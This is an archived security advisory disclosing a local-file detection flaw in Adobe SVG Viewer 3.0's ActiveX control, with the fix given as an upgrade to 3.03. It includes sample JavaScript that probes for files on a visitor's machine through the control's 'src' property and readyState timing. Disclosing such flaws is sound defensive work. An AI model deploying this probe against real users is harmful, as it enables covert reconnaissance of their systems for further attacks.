<<< Date Index >>>     <<< Thread Index >>>

Local file detection bug found through Adobe SVG Viewer



Hyperdose Security Advisory

Name: Local file detection bug found through Adobe SVG Viewer
Systems Affected: v3.0 (unclear if earlier versions were affected)
Severity: Low
Author: Robert Fly - robfly@xxxxxxxxxxxxx
Advisory URL: http://www.hyperdose.com/advisories/H2005-07.txt

--Adobe Description--
>From Adobe.com, "Adobe helps people and businesses communicate better
through its world-leading digital imaging, design, and document technology
platforms for consumers, creative professionals, and enterprises.".

--Bug Details--
Adobe SVG Viewer contains a Safe for Scripting ActiveX control (file
NPSVG3.dll).  The control contains a property named 'src'.  When 'src' is
set to a file that does exist, the web page will stop loading immediately.
If 'src' is set to a file that does not exist the page will continue to load
(specifically readystate will not hit the complete state).  Using this trick
a little bit of javascript can be used to determine if local files exist on
a users hard drive.  Knowing the existence of files can be a stepping stone
for further attacks.

Proof of concept: http://www.hyperdose.com/exploits/AdobeSVG.html
Sample Javascript:
function load(filename)
{
        //foo is reference to SVG ActiveX control, filename is the filename
you're looking for
        foo.src = filename;  
        setTimeout("loading()", 5000);
}

function loading()
{
        if (document.readyState != 'complete')
        {
                alert('File does not exist.');
        }
        else
        {
                alert('File exists.');
        }
        window.location.reload(false);
}


This bug is very similar to Hyperdose's last advisory on Adobe
(http://www.hyperdose.com/advisories/H2005-06.txt).  The exploit mechanism
for this one though is more interesting.  Be aware of timing based attacks.
If you pay attention, they're out there.

--Fix Information--
Upgrade to version 3.03.  
Details from Adobe found here:
http://www.adobe.com/svg/viewer/install/mainframed.html

--About Hyperdose--
Hyperdose Security was founded to provide companies with application
security knowledge through all parts of an application's security
development lifecycle.  We specialize in all phases of software development
ranging from security design and architectural reviews, security code
reviews and penetration testing.

web   www.hyperdose.com 
email robfly@xxxxxxxxxxxxx